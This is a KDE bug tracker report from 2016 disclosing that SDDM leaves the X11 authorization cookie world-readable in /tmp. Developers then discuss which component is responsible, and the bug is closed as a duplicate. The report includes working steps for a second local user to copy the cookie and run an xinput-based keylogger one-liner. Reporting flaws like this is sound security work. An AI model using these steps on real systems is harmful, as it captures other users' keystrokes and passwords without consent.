363140 – World-readable X11 Cookie, easy key logger

Bug 363140 - World-readable X11 Cookie, easy key logger

Summary: World-readable X11 Cookie, easy key logger

Status:	RESOLVED DUPLICATE of bug 358593

Alias:	None

Product:	kde
Classification:	I don't know
Component:	general (show other bugs)
Version:	unspecified
Platform:	Arch Linux Linux

Importance:	NOR normal
Target Milestone:	---
Assignee:	Unassigned bugs mailing-list

URL:
Keywords:

Depends on:
Blocks:

Reported:	2016-05-16 15:55 UTC by David Rumley
Modified:	2016-06-22 11:10 UTC (History)
CC List:	6 users (show)

See Also:
Latest Commit:
Version Fixed In:
Sentry Crash Report:

Attachments
Add an attachment

Note You need to log in before you can comment on or make changes to this bug.

Description David Rumley 2016-05-16 15:55:02 UTC

After logging in as any user, you are able to get the X11 cookie and start a key logger. This has been tested on a F23 system with KDE / SDDM (with current patches) and a Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1). 

You are able to easily get the X11 cookie.
$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8  .Xauthority

$ sha256sum /tmp/xauth-1000-_0
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8  
/tmp/xauth-1000-_0

The cookie is world-readable, even if you change the permissions to the cookie, after a reboot the changes are gone.
$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0

I have another user that I log via the text console, after that you just need to start the typical X11 keylogger.
$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1 xinput test

Reproducible: Always

Steps to Reproduce:
1. Login via the text console on any user.
2. Copy the X11 cookie over to .Xauthority file for the user you just logged into.
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list |  grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' |  xargs -P0 -n1 xinput test

Actual Results:  
After running the commands listed in "Steps to Reproduce" section, all the keyboard pushes are printed to the text console.

Expected Results:  
The X11 cookie should not be world-readable.

Comment 1 Frederik Schwarzer 2016-05-16 20:59:32 UTC

www.kde.org might be the wrong Product, no?
Not sure where it would belong to, though. Maybe frameworks-kinit?

Comment 2 David Rumley 2016-05-16 21:15:32 UTC

I'm not sure, I thought it belonged here. If not I can always move it.

Comment 3 Albert Astals Cid 2016-05-16 21:41:51 UTC

I'd say this is a bug in sddm.

Abusing the CC here to add Pier Luigi and Martin for confirmation.

Comment 4 Ben Cooksley 2016-05-17 09:29:20 UTC

Moving to a generic component to get this off the kde-www mailing list.

Comment 5 Christoph Feck 2016-05-17 12:00:59 UTC

Bug 329616 indicates that the xauth file might not be created by the display manager.

Comment 6 Christoph Feck 2016-05-17 12:16:16 UTC


*** This bug has been marked as a duplicate of bug 358593 ***

Comment 7 Albert Astals Cid 2016-05-17 21:04:58 UTC

That bug is only for the tmp file for not for  .Xauthority ?

Comment 8 Pier Luigi Fiorini 2016-05-17 21:21:34 UTC

sddm creates ~/.Xauthority with xauth, but you are talking of another file here.
this indeed might be a duplicate of 358593 as it sounds a lot like the file referenced there.

Comment 9 Albert Astals Cid 2016-05-17 21:33:43 UTC

Right i read the code of sddm too quickly and thought it was using a QFile to create the .XAuthority file.

*** This bug has been marked as a duplicate of bug 358593 ***

Comment 10 Pier Luigi Fiorini 2016-05-17 21:50:21 UTC

sddm should set the XAUTHORITY env var, you might consider changing kdeinit to use that instead